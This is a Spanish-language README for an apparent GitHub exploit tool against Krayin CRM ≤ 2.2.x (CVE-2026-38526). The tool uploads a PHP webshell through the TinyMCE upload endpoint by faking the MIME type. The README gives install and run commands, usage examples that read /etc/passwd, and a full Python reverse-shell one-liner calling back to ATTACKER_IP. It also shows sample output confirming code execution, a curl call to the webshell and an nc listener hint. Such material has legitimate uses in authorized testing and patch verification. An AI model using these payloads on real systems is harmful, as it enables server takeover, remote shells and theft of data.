
Exploit automatizado para Krayin CRM ≤ 2.2.x.
Exploit automatizado para Krayin CRM ≤ 2.2.x. Este script explota una vulnerabilidad de subida de archivos sin restricciones en el endpoint de TinyMCE (/admin/tinymce/upload), evade la validación del tipo MIME falsificando image/jpeg, sube una webshell PHP y ejecuta comandos arbitrarios con los privilegios del servidor web.
| Propiedad | Valor |
|---|---|
| CVE ID | CVE-2026-38526 |
| Software afectado | Krayin CRM ≤ 2.2.x |
| Tipo de vulnerabilidad | Subida de archivos sin restricciones → Ejecución remota de código |
| Autenticación | Requerida (cualquier cuenta de administrador válida) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload con tipo MIME falsificado[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Error de autenticación: Verifique que las credenciales sean correctas y que la cuenta exista en el objetivo.
Error al extraer el token CSRF: Asegúrese de que el objetivo ejecuta una versión vulnerable de Krayin CRM y de que el endpoint de inicio de sesión sea accesible.
La shell inversa no se conecta: Asegúrese de que su listener esté en ejecución (nc -lvnp <PORT>), de que las reglas del firewall permitan conexiones salientes y de que la IP/puerto del payload sean correctos.
Esta herramienta se proporciona estrictamente para pruebas de seguridad autorizadas y fines educativos únicamente. El acceso no autorizado a sistemas informáticos es ilegal. Los usuarios son los únicos responsables de asegurarse de contar con la autorización adecuada antes de probar cualquier sistema objetivo. El autor no asume ninguna responsabilidad por el uso indebido o los daños causados por esta herramienta.
b0nyo - Implementación del PoC
TREXNEGRO - Descubrimiento de la vulnerabilidad
| Flag | Descripción | Ejemplo |
|---|
-i | URL del objetivo (con o sin http://) | http://target.com o target.com |
-u | Correo/nombre de usuario del administrador | [email protected] |
-p | Contraseña del administrador | AdminPassword123! |
-c | Comando a ejecutar (por defecto: id) | whoami |